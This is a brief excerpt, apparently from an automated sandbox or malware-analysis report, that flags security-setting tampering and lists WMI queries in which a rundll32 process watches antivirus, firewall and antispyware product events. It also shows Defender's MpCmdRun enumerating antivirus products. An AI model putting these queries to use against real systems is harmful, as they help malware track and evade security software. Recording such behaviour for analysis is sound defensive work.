Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Windows\SysWOW64\rundll32.exe	WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct